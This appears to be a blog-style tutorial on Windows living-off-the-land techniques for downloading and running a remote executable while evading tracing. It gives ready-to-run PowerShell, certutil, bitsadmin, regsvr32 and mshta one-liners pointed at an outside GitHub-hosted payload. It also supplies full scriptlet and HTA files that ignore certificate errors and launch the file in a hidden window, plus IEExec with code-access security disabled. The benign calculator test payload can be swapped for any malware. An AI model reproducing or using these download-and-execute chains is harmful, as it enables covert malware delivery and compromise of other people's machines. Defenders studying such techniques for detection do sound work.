Introduction
The goal is to raise the cost of tracing the payload back to its source, avoid detection while it is fetched, and improve concealment. Keep in mind that every downloader below is a well-known living-off-the-land pattern (certutil -urlcache, bitsadmin /transfer, regsvr32 /i:http, mshta with a URL), so the concealment is against casual tracing of the file, not against process-creation logging that keys on these command lines.
Test payload:
https://github.com/YangSirrr/Yangsir-blog-img/raw/main/calc.exe
Each technique below downloads it to C:\test as yang.exe and executes it; create C:\test first.
In practice
powershell
powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/YangSirrr/Yangsir-blog-img/raw/main/calc.exe','C:\test\yang.exe');start-process 'C:\test\yang.exe'
The same command with doubled backslashes. This is the form needed when the command is embedded in a JScript string (as in the regsvr32 JScript variant below, where JScript unescapes them); Windows path handling also collapses the repeated separators, so it works when typed directly as well:
powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/YangSirrr/Yangsir-blog-img/raw/main/calc.exe','c:\\test\\yang.exe');start-process 'c:\\test\\yang.exe'
certutil
certutil -urlcache -split -f https://github.com/YangSirrr/Yangsir-blog-img/raw/main/calc.exe C:\test\yang.exe&&C:\test\yang.exe
-split writes the body to the given path, but -urlcache also leaves a copy of the download in the user's INetCache, which works against the concealment goal unless that cache entry is cleared afterwards.
bitsadmin
Slow, and not recommended; the transfer is also recorded as a job in the Microsoft-Windows-Bits-Client/Operational event log.
bitsadmin /transfer n https://github.com/YangSirrr/Yangsir-blog-img/raw/main/calc.exe C:\test\yang.exe && C:\test\yang.exe
regsvr32
VBScript scriptlet variant (download and execute). /s runs regsvr32 silently and /i: hands the URL to scrobj.dll, whose DllInstall fetches the scriptlet and runs its registration script:
regsvr32 /s /i:https://github.com/YangSirrr/Yangsir-blog-img/raw/main/download.sct scrobj.dll
Script body of the scriptlet:
' Download calc.exe with ServerXMLHTTP and write it to disk as a binary stream
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim http, ado
Set http = CreateObject("Msxml2.ServerXMLHTTP.6.0")
' Option 2 is SXH_OPTION_IGNORE_SERVER_SSL_CERT_ERROR_FLAGS; 13056 (0x3300) ignores every certificate error
http.SetOption 2, 13056
http.open "GET", "https://github.com/YangSirrr/Yangsir-blog-img/raw/main/calc.exe", False
http.send
Set ado = CreateObject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
' Pass the overwrite flag, otherwise SaveToFile fails when C:\test\yang.exe already exists
ado.SaveToFile "C:\test\yang.exe", adSaveCreateOverWrite
ado.Close
JScript scriptlet variant, which delegates the download and execution to PowerShell. The /u (unregister) form also makes scrobj.dll fetch and run the scriptlet's registration script:
regsvr32 /u /s /i:https://github.com/YangSirrr/Yangsir-blog-img/raw/main/download.sct scrobj.dll
Script body of the scriptlet:
// Run the PowerShell one-liner hidden (window style 0) and wait for it to finish (true)
new ActiveXObject("WScript.Shell").Run("powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/YangSirrr/Yangsir-blog-img/raw/main/calc.exe','c:\\test\\yang.exe');start-process 'c:\\test\\yang.exe'",0,true);
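A complete download.sct, added here as an example and not the file hosted in the page's repository: it wraps the VBScript body above in the registration element that scrobj.dll executes when regsvr32 passes it the URL. The progid and classid are arbitrary placeholders (any unique GUID will do), and the final Run line is an addition so that the scriptlet also executes the file, which the body as shown on the page does not do. The JScript variant drops into the same wrapper by changing the script element to language="JScript".

```xml
<?xml version="1.0"?>
<scriptlet>
<registration
    progid="YangDownload"
    classid="{A1B2C3D4-E5F6-4A7B-8C9D-0E1F2A3B4C5D}" >
<script language="VBScript">
<![CDATA[
' progid and classid above are placeholders (assumption): replace with any unique GUID
' Body from the page: fetch calc.exe over HTTPS and write it to C:\test\yang.exe
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim http, ado
Set http = CreateObject("Msxml2.ServerXMLHTTP.6.0")
' Option 2 = SXH_OPTION_IGNORE_SERVER_SSL_CERT_ERROR_FLAGS; 13056 (0x3300) ignores all certificate errors
http.SetOption 2, 13056
http.open "GET", "https://github.com/YangSirrr/Yangsir-blog-img/raw/main/calc.exe", False
http.send
Set ado = CreateObject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
ado.SaveToFile "C:\test\yang.exe", adSaveCreateOverWrite
ado.Close
' Added here (not part of the page's body): run the file with a hidden window and do not wait
CreateObject("WScript.Shell").Run "C:\test\yang.exe", 0, False
]]>
</script>
</registration>
</scriptlet>
```

Host the file at the download.sct URL used in the two regsvr32 commands above; both the /s /i: and the /u /s /i: forms run the registration block, so the download and execution happen regardless of which one is used.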
mshta
mshta accepts http and https URLs; the remote file must be an HTML page (an HTA) that carries the script, otherwise mshta renders it as plain text and nothing runs.
A local web server is used as the example:
mshta http://127.0.0.1/calc.hta
The HTA's script hands the download and execution to PowerShell with the same one-liner as above:
powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/YangSirrr/Yangsir-blog-img/raw/main/calc.exe','C:\test\yang.exe');start-process 'C:\test\yang.exe'
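A calc.hta that does what this section describes, added as an example rather than the author's own file: a minimal HTML Application whose VBScript runs the PowerShell one-liner above through WScript.Shell and then closes its own window so nothing stays on screen. The file name and the 127.0.0.1 server are the page's; the markup and script are assumed.

```html
<html>
<head>
<title>calc</title>
<script language="VBScript">
' Example HTA, not the page's file. Runs the page's PowerShell one-liner through
' WScript.Shell with a hidden window (0) and without waiting (False), so the HTA
' can close immediately while PowerShell keeps running as a separate process.
Set sh = CreateObject("WScript.Shell")
sh.Run "powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/YangSirrr/Yangsir-blog-img/raw/main/calc.exe','C:\test\yang.exe');start-process 'C:\test\yang.exe'", 0, False
' Close the HTA window right away
window.close
</script>
</head>
<body></body>
</html>
```

Place the file in the local web root so that mshta http://127.0.0.1/calc.hta fetches it; the script runs as soon as mshta parses the head of the document.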
IEExec
Hit a pitfall here, not yet solved; to be revisited later.
Run from the .NET Framework 2.0 directory. caspol -s off disables code-access-security enforcement for that runtime and needs an elevated prompt. Note that IEExec loads the URL target as a .NET assembly, so it only works for a managed executable, not for a native PE such as calc.exe.
cd C:\Windows\Microsoft.NET\Framework\v2.0.50727\
caspol -s off
IEExec http://192.168.3.8/yang.exe